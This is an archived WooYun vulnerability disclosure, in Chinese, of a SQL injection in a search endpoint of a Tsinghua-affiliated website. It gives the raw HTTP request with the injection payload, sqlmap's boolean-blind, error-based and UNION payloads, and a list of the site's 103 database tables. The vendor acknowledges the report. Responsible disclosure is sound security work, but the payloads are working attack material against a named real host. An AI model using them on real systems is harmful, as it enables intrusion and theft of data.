乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-28: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经确认,细节仅向厂商公开 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
POST /search/znss.php HTTP/1.1Content-Length: 212Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.rsta.tsinghua.edu.cnCookie: thuwebcookie=2668064522.20480.0000; PHPSESSID=cv9p2coj4nvsvoce85ob9l36g6; CNZZDATA2049882=cnzz_eid%3D254369399-1448558447-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1448558447; tq_source_page_url=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); tq_current_visit_time=1448558445174; tq_current_source_page_url=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); SRV=20Host: www.rsta.tsinghua.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1* -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1 AND 5804=5804 -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=1 AND (SELECT 2349 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(2349=2349,1))),0x71626a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: hangye=%e4%bc%81%e4%b8%9a&lingyu=%e8%af%b7%e9%80%89%e6%8b%a9&lingyu1=-1' OR 1=-7185 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706b71,0x616a43726250595a6d54,0x71626a7171),NULL,NULL-- -- &lingyu2=%e5%85%a8%e9%83%a8%e9%a2%86%e5%9f%9f&lingyu3=%e8%af%b7%e9%80%89%e6%8b%a9&neirong=1---web application technology: Nginxback-end DBMS: MySQL 5.0Database: hdm0050741_db[103 tables]+------------------------+| xh_admin || xh_admin_role || xh_admin_role_priv || xh_ads || xh_ads_place || xh_ads_stat || xh_announce || xh_area || xh_ask || xh_ask_actor || xh_ask_credit || xh_ask_posts || xh_ask_vote || xh_attachment || xh_author || xh_block || xh_c_bkyd || xh_c_down || xh_c_hyfc || xh_c_info || xh_c_ku6video || xh_c_news || xh_c_picture || xh_c_product || xh_c_video || xh_cache_count || xh_category || xh_collect || xh_comment || xh_content || xh_content_count || xh_content_position || xh_content_tag || xh_copyfrom || xh_datasource || xh_digg || xh_digg_log || xh_editor_data || xh_error_report || xh_form_bdxx || xh_form_jishuzixun || xh_form_yjsk || xh_formguide || xh_formguide_fields || xh_guestbook || xh_hits || xh_ipbanned || xh_keylink || xh_keyword || xh_link || xh_log || xh_mail || xh_mail_email || xh_mail_email_type || xh_member || xh_member_cache || xh_member_company || xh_member_detail || xh_member_group || xh_member_group_extend || xh_member_group_priv || xh_member_info || xh_member_qyhy || xh_menu || xh_message || xh_model || xh_model_field || xh_module || xh_mood || xh_mood_data || xh_order || xh_order_deliver || xh_order_log || xh_pay_card || xh_pay_exchange || xh_pay_payment || xh_pay_pointcard_type || xh_pay_stat || xh_pay_user_account || xh_player || xh_position || xh_process || xh_process_status || xh_role || xh_search || xh_search_type || xh_session || xh_space || xh_space_api || xh_special || xh_special_content || xh_spider_job || xh_spider_sites || xh_spider_urls || xh_status || xh_times || xh_type || xh_urlrule || xh_vote_data || xh_vote_option || xh_vote_subject || xh_vote_useroption || xh_workflow |+------------------------+
危害等级:高
漏洞Rank:15
确认时间:2015-11-30 14:38
谢谢提醒,我们会尽快处理的。
暂无